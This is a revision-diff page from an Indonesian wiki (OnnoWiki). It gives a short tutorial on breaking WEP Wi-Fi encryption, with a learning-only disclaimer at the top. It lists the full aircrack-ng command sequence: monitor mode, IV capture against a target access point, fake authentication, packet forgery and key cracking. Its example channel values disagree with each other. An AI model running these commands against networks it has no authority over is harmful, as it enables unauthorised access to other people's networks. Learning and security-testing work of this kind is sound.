Difference between revisions of "Teknik Menjebol WEP"

From OnnoWiki
Jump to navigation Jump to search
 
(4 intermediate revisions by the same user not shown)
Line 1: Line 1:
 +
'''Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.'''
 +
 +
 +
 +
----
 +
 +
 +
 +
 +
 
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol [[WEP]].
 
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol [[WEP]].
  
* Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
+
* Kita perlu mencatat tiga (3) hal, yaitu, (1) [[BSSID]] / [[MAC Addresss]] [[AP]], (2) [[MAC address]] [[WLAN]] kita, dan (3) Channel yang digunakan [[AP]].
  
  
 
Misalnya,
 
Misalnya,
  
  BSSID    00:11:6B:60:86:91
+
  BSSID    00:30:4F:4E:2B:50
 
  WIFI    00:11:6b:33:d3:90
 
  WIFI    00:11:6b:33:d3:90
 
  CHANNEL  2
 
  CHANNEL  2
Line 13: Line 23:
 
Untuk memudahkan operasi ada baiknya melakukan
 
Untuk memudahkan operasi ada baiknya melakukan
  
  # export AP=00:11:6B:60:86:91
+
  # export AP=00:30:4F:4E:2B:50
 
  # export WIFI=00:11:6b:33:d3:90
 
  # export WIFI=00:11:6b:33:d3:90
  # export CHANNEL=2
+
  # export CHANNEL=1
  
  
Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card WLAN di eth1
+
Teknik mencari data [[BSSID]] & [[CHANNEL]] di atas menggunakan perintah, misalnya, [[card WLAN]] di eth1.
 +
Pastikan bahwa eth1 berada pada mode monitor
  
 +
# iwconfig eth1 mode monitor
 +
# iwconfig eth1
 
  # airmon-ng start eth1
 
  # airmon-ng start eth1
  # airodump-ng eth1
+
  # airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
 +
 
  
 +
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan [[Access Point]], sayangnya biasanya sukar untuk dapat berasosiasi dengan [[Access Point]] yang terenkripsi. Jika ada bug di [[Access Point]], kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke [[Access Point]] tersebut
  
Pastikan bahwa eth1 berada pada mode monitor
+
# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1
  
# iwconfig eth1 mode monitor
 
# iwconfig eth1
 
  
 +
Jika berhasil [[authentikasi]], kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic
 +
paket yang lewat dari / menuju [[access point]]. Perintah yang digunakan adalah
  
Lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut
+
# aireplay-ng -5 -b $AP -h $WIFI eth1
  
# airmon-ng stop eth1
 
# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1
 
  
 +
Setelah kita cukup banyak berhasil menangkap paket. Proses [[cracking]] [[WEP]] dapat dilakukan menggunakan
  
 +
# aircrack-ng -a 1 -n 64 hasilcapture.ivs
  
  

Latest revision as of 14:58, 25 November 2009

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.





Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.


Misalnya,

BSSID    00:30:4F:4E:2B:50
WIFI     00:11:6b:33:d3:90
CHANNEL  2


Untuk memudahkan operasi ada baiknya melakukan

# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1


Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card WLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor

# iwconfig eth1 mode monitor
# iwconfig eth1
# airmon-ng start eth1
# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1


Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut

# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1


Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah

# aireplay-ng -5 -b $AP -h $WIFI eth1


Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan menggunakan

# aircrack-ng -a 1 -n 64 hasilcapture.ivs 





Pranala Menarik